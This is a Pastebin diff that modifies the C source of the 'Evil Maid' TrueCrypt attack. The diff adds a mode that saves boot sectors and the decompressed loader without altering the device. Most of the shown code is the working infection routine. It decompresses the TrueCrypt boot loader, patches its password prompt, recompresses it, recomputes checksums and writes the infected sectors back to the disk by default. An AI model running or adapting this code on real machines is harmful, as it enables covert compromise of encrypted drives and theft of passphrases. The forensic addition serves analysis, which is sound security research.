Guest User

DiabloHorn

a guest
Mar 23rd, 2014
639
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. --- patch_tc.c 2009-10-13 20:06:07.000000000 +0200
  2. +++ patch_tc_modified.c 2014-03-23 22:14:49.073346732 +0100
  3. @@ -1,3 +1,13 @@
  4. +/*
  5. + Original blog post: http://theinvisiblethings.blogspot.nl/2009/10/evil-maid-goes-after-truecrypt.html
  6. + Original src download: http://invisiblethingslab.com/resources/evilmaid/evilmaid-src-1.0.tgz
  7. + Original Author: Joanna Rutkowska
  8. + Modified by: DiabloHorn
  9. +
  10. + Slight modification to permit the saving of the sectors and the unzipped
  11. + second loader without modifying the original image / device
  12. +*/
  13. +
  14. #include <stdio.h>
  15. #include <stdlib.h>
  16. #include <fcntl.h>
  17. @@ -16,6 +26,7 @@
  18.  
  19. typedef enum {FALSE = 0, TRUE} bool;
  20.  
  21. +int do_forensically = 0;
  22.  
  23. bool SaveSectors (
  24. void* Sectors,
  25. @@ -217,10 +228,12 @@
  26. return FALSE;
  27.  
  28. uCompressedLoaderSize = *(unsigned short*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET];
  29. +
  30. if (uCompressedLoaderSize > (uSectorsCount - 5) * SECTOR_SIZE)
  31. return FALSE;
  32.  
  33. uChecksum = GetChecksum (&pFirstSectors[SECTOR_SIZE], 4 * SECTOR_SIZE + uCompressedLoaderSize);
  34. +
  35. if (*(unsigned long*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_CHECKSUM_OFFSET] != uChecksum)
  36. return FALSE;
  37.  
  38. @@ -259,7 +272,7 @@
  39.  
  40. uCompressedLoaderSize = *(unsigned short*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET];
  41. printf ("PatchTrueCrypt(): Compressed loader size: %d bytes\n", uCompressedLoaderSize);
  42. -
  43. + printf ("PatchTrueCrypt(): Saved checksum 0x%X\n", (*(unsigned long*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_CHECKSUM_OFFSET]));
  44. // in MBR:
  45.  
  46. // B9 FF XX mov cx, 0xXXff ; TC_BOOT_MEMORY_REQUIRED * 1024 - TC_COM_EXECUTABLE_OFFSET - 1
  47. @@ -297,124 +310,125 @@
  48. }
  49.  
  50. printf ("PatchTrueCrypt(): Decompression successful\n");
  51. + if(!do_forensically){
  52. + hDecompressedLoader = open (LOADER, O_RDONLY);
  53. + if (hDecompressedLoader < 0) {
  54. + printf ("PatchTrueCrypt(): Failed to open %s, last error %d\n", LOADER, errno);
  55. + return FALSE;
  56. + }
  57. +
  58. + if (fstat (hDecompressedLoader, &FileStatStruct) == -1) {
  59. + printf ("PatchTrueCrypt(): Cannot stat file, error %d\n", errno);
  60. + close (hDecompressedLoader);
  61. + return FALSE;
  62. + }
  63. + uDecompressedLoaderSize = FileStatStruct.st_size;
  64. +
  65. + printf ("PatchTrueCrypt(): Decompressed loader physical size: %d bytes\n", uDecompressedLoaderSize);
  66. +
  67. + if (uDecompressedLoaderSize > uLoaderMemorySize) {
  68. + printf ("PatchTrueCrypt(): Memory size taken from MBR contradicts the decompressed binary size\n");
  69. + close (hDecompressedLoader);
  70. + return FALSE;
  71. + }
  72. +
  73. + pDecompressedLoader = malloc (uLoaderMemorySize);
  74. + if (!pDecompressedLoader) {
  75. + printf ("PatchTrueCrypt(): Failed to allocate memory for the decompressed loader\n");
  76. + close (hDecompressedLoader);
  77. + return FALSE;
  78. + }
  79. + memset (pDecompressedLoader, 0, uLoaderMemorySize);
  80. +
  81. + nbRead = read (hDecompressedLoader, pDecompressedLoader, uDecompressedLoaderSize);
  82. + if (nbRead != uDecompressedLoaderSize) {
  83. + printf
  84. + ("PatchTrueCrypt(): ReadFile() failed (last error %d) while reading the decompressed loader\n",
  85. + errno);
  86. + free (pDecompressedLoader);
  87. + close (hDecompressedLoader);
  88. + return FALSE;
  89. + }
  90.  
  91. - hDecompressedLoader = open (LOADER, O_RDONLY);
  92. - if (hDecompressedLoader < 0) {
  93. - printf ("PatchTrueCrypt(): Failed to open %s, last error %d\n", LOADER, errno);
  94. - return FALSE;
  95. - }
  96. -
  97. - if (fstat (hDecompressedLoader, &FileStatStruct) == -1) {
  98. - printf ("PatchTrueCrypt(): Cannot stat file, error %d\n", errno);
  99. - close (hDecompressedLoader);
  100. - return FALSE;
  101. - }
  102. - uDecompressedLoaderSize = FileStatStruct.st_size;
  103. -
  104. - printf ("PatchTrueCrypt(): Decompressed loader physical size: %d bytes\n", uDecompressedLoaderSize);
  105. -
  106. - if (uDecompressedLoaderSize > uLoaderMemorySize) {
  107. - printf ("PatchTrueCrypt(): Memory size taken from MBR contradicts the decompressed binary size\n");
  108. - close (hDecompressedLoader);
  109. - return FALSE;
  110. - }
  111. -
  112. - pDecompressedLoader = malloc (uLoaderMemorySize);
  113. - if (!pDecompressedLoader) {
  114. - printf ("PatchTrueCrypt(): Failed to allocate memory for the decompressed loader\n");
  115. - close (hDecompressedLoader);
  116. - return FALSE;
  117. - }
  118. - memset (pDecompressedLoader, 0, uLoaderMemorySize);
  119. -
  120. - nbRead = read (hDecompressedLoader, pDecompressedLoader, uDecompressedLoaderSize);
  121. - if (nbRead != uDecompressedLoaderSize) {
  122. - printf
  123. - ("PatchTrueCrypt(): ReadFile() failed (last error %d) while reading the decompressed loader\n",
  124. - errno);
  125. - free (pDecompressedLoader);
  126. - close (hDecompressedLoader);
  127. - return FALSE;
  128. - }
  129. -
  130. -
  131. - close (hDecompressedLoader);
  132. - unlink (LOADER);
  133. -
  134. -/*
  135. - if (!SaveSectors (pDecompressedLoader, uLoaderMemorySize, "unc")) {
  136. - return FALSE;
  137. - }
  138. -*/
  139. -
  140. - pUncompressedPatchedLoader = NULL;
  141. - uPatchedLoaderMemorySize = 0;
  142. - if (!PatchAskPassword
  143. - (pDecompressedLoader, uLoaderMemorySize, &pUncompressedPatchedLoader, &uPatchedLoaderMemorySize,
  144. - pbAlreadyInfected)) {
  145. - printf ("PatchTrueCrypt(): PatchAskPassword() failed\n");
  146. - free (pDecompressedLoader);
  147. - return FALSE;
  148. - }
  149. -
  150. - free (pDecompressedLoader);
  151.  
  152. - *(unsigned short*) & pFirstSectors[uLoaderMemorySizeMBROffset] =
  153. - ALIGN (uPatchedLoaderMemorySize, 0x400) - 1 - TC_COM_EXECUTABLE_OFFSET;
  154. -
  155. - if (!SaveSectors (pUncompressedPatchedLoader, uPatchedLoaderMemorySize, PATCHED_LOADER)) {
  156. - free (pUncompressedPatchedLoader);
  157. - return FALSE;
  158. - }
  159. -
  160. - free (pUncompressedPatchedLoader);
  161. -
  162. - unlink (PATCHED_LOADER_COMPRESSED);
  163. -
  164. - printf ("PatchTrueCrypt(): Compressing the patched loader\n");
  165. -
  166. - if (WEXITSTATUS(system("gzip -n --best -f " PATCHED_LOADER)) != 0) {
  167. - printf ("PatchTrueCrypt(): Compression failed\n");
  168. - return FALSE;
  169. - }
  170. -
  171. - printf ("PatchTrueCrypt(): Compression successful\n");
  172. -
  173. - hCompressedPatchedLoader = open (PATCHED_LOADER_COMPRESSED, O_RDONLY);
  174. - if (hCompressedPatchedLoader < 0) {
  175. - printf ("PatchTrueCrypt(): Failed to open %s, last error %d\n", LOADER, errno);
  176. - return FALSE;
  177. - }
  178. -
  179. - if (fstat (hCompressedPatchedLoader, &FileStatStruct) == -1) {
  180. - printf ("PatchTrueCrypt(): Cannot stat file, error %d\n", errno);
  181. - close (hCompressedPatchedLoader);
  182. - return FALSE;
  183. - }
  184. - uCompressedPatchedLoaderSize = FileStatStruct.st_size;
  185. -
  186. -
  187. - printf ("PatchTrueCrypt(): Compressed patched loader size: %d bytes\n", uCompressedPatchedLoaderSize);
  188. + close (hDecompressedLoader);
  189. + unlink (LOADER);
  190. +
  191.  
  192. - nbRead = read (hCompressedPatchedLoader, &pFirstSectors[5 * SECTOR_SIZE], uCompressedPatchedLoaderSize);
  193. - if (nbRead != uCompressedPatchedLoaderSize) {
  194. - printf
  195. - ("PatchTrueCrypt(): ReadFile() failed (last error %d) while reading the compressed loader\n",
  196. - errno);
  197. - close (hCompressedPatchedLoader);
  198. - return FALSE;
  199. - }
  200. + /*
  201. + if (!SaveSectors (pDecompressedLoader, uLoaderMemorySize, "unc")) {
  202. + return FALSE;
  203. + }
  204. + */
  205. +
  206. + pUncompressedPatchedLoader = NULL;
  207. + uPatchedLoaderMemorySize = 0;
  208. + if (!PatchAskPassword
  209. + (pDecompressedLoader, uLoaderMemorySize, &pUncompressedPatchedLoader, &uPatchedLoaderMemorySize,
  210. + pbAlreadyInfected)) {
  211. + printf ("PatchTrueCrypt(): PatchAskPassword() failed\n");
  212. + free (pDecompressedLoader);
  213. + return FALSE;
  214. + }
  215. +
  216. + free (pDecompressedLoader);
  217. +
  218. + *(unsigned short*) & pFirstSectors[uLoaderMemorySizeMBROffset] =
  219. + ALIGN (uPatchedLoaderMemorySize, 0x400) - 1 - TC_COM_EXECUTABLE_OFFSET;
  220. +
  221. + if (!SaveSectors (pUncompressedPatchedLoader, uPatchedLoaderMemorySize, PATCHED_LOADER)) {
  222. + free (pUncompressedPatchedLoader);
  223. + return FALSE;
  224. + }
  225. +
  226. + free (pUncompressedPatchedLoader);
  227. +
  228. + unlink (PATCHED_LOADER_COMPRESSED);
  229. +
  230. + printf ("PatchTrueCrypt(): Compressing the patched loader\n");
  231. +
  232. + if (WEXITSTATUS(system("gzip -n --best -f " PATCHED_LOADER)) != 0) {
  233. + printf ("PatchTrueCrypt(): Compression failed\n");
  234. + return FALSE;
  235. + }
  236. +
  237. + printf ("PatchTrueCrypt(): Compression successful\n");
  238. +
  239. + hCompressedPatchedLoader = open (PATCHED_LOADER_COMPRESSED, O_RDONLY);
  240. + if (hCompressedPatchedLoader < 0) {
  241. + printf ("PatchTrueCrypt(): Failed to open %s, last error %d\n", LOADER, errno);
  242. + return FALSE;
  243. + }
  244. +
  245. + if (fstat (hCompressedPatchedLoader, &FileStatStruct) == -1) {
  246. + printf ("PatchTrueCrypt(): Cannot stat file, error %d\n", errno);
  247. + close (hCompressedPatchedLoader);
  248. + return FALSE;
  249. + }
  250. + uCompressedPatchedLoaderSize = FileStatStruct.st_size;
  251. +
  252. +
  253. + printf ("PatchTrueCrypt(): Compressed patched loader size: %d bytes\n", uCompressedPatchedLoaderSize);
  254. +
  255. + nbRead = read (hCompressedPatchedLoader, &pFirstSectors[5 * SECTOR_SIZE], uCompressedPatchedLoaderSize);
  256. + if (nbRead != uCompressedPatchedLoaderSize) {
  257. + printf
  258. + ("PatchTrueCrypt(): ReadFile() failed (last error %d) while reading the compressed loader\n",
  259. + errno);
  260. + close (hCompressedPatchedLoader);
  261. + return FALSE;
  262. + }
  263.  
  264.  
  265. - close (hCompressedPatchedLoader);
  266. - unlink (PATCHED_LOADER_COMPRESSED);
  267. + close (hCompressedPatchedLoader);
  268. + unlink (PATCHED_LOADER_COMPRESSED);
  269.  
  270. - uChecksum = GetChecksum (&pFirstSectors[SECTOR_SIZE], 4 * SECTOR_SIZE + uCompressedPatchedLoaderSize);
  271. - printf ("PatchTrueCrypt(): New checksum: 0x%X\n", uChecksum);
  272. -
  273. - *(unsigned long*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_CHECKSUM_OFFSET] = uChecksum;
  274. - *(unsigned short*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET] = (short) uCompressedPatchedLoaderSize;
  275. + uChecksum = GetChecksum (&pFirstSectors[SECTOR_SIZE], 4 * SECTOR_SIZE + uCompressedPatchedLoaderSize);
  276. + printf ("PatchTrueCrypt(): New checksum: 0x%X\n", uChecksum);
  277.  
  278. + *(unsigned long*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_CHECKSUM_OFFSET] = uChecksum;
  279. + *(unsigned short*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET] = (short) uCompressedPatchedLoaderSize;
  280. + }
  281. return TRUE;
  282. }
  283.  
  284. @@ -458,11 +472,15 @@
  285.  
  286. printf (VER_STRING);
  287.  
  288. - if (argc != 2) {
  289. + if (argc < 2) {
  290. printf ("Usage: %s <target>\n", argv[0]);
  291. return 1;
  292. }
  293. -
  294. +
  295. + if( argc == 3){
  296. + do_forensically = 1;
  297. + }
  298. +
  299. if (!ReadFirstSectors (argv[1], SECTORS_TO_BACKUP, (char**)&pFirstSectors, &hDevice)) {
  300. return 2;
  301. }
  302. @@ -499,24 +517,25 @@
  303. return 5;
  304. }
  305. }
  306. + if(!do_forensically){
  307. + lseek (hDevice, 0, SEEK_SET);
  308.  
  309. - lseek (hDevice, 0, SEEK_SET);
  310. -
  311. - nbWritten = write (hDevice, pFirstSectors, SECTORS_TO_BACKUP * SECTOR_SIZE);
  312. - if (nbWritten != SECTORS_TO_BACKUP * SECTOR_SIZE) {
  313. - printf ("Failed to update the first sectors of a device, last error %d\n", errno);
  314. - close (hDevice);
  315. - //unlink (szBackupName);
  316. - return FALSE;
  317. - }
  318. -
  319. -/* if (!SaveSectors (pFirstSectors, SECTORS_TO_BACKUP * SECTOR_SIZE, "patched_image")) {
  320. - printf ("SaveSectors() failed to backup first %d sectors of the drive\n", SECTORS_TO_BACKUP);
  321. - free (pFirstSectors);
  322. - close (hDevice);
  323. - return;
  324. - }
  325. -*/
  326. + nbWritten = write (hDevice, pFirstSectors, SECTORS_TO_BACKUP * SECTOR_SIZE);
  327. + if (nbWritten != SECTORS_TO_BACKUP * SECTOR_SIZE) {
  328. + printf ("Failed to update the first sectors of a device, last error %d\n", errno);
  329. + close (hDevice);
  330. + //unlink (szBackupName);
  331. + return FALSE;
  332. + }
  333. +
  334. + /* if (!SaveSectors (pFirstSectors, SECTORS_TO_BACKUP * SECTOR_SIZE, "patched_image")) {
  335. + printf ("SaveSectors() failed to backup first %d sectors of the drive\n", SECTORS_TO_BACKUP);
  336. + free (pFirstSectors);
  337. + close (hDevice);
  338. + return;
  339. + }
  340. + */
  341. + }
  342. free (pFirstSectors);
  343. close (hDevice);
  344. return 0;
RAW Paste Data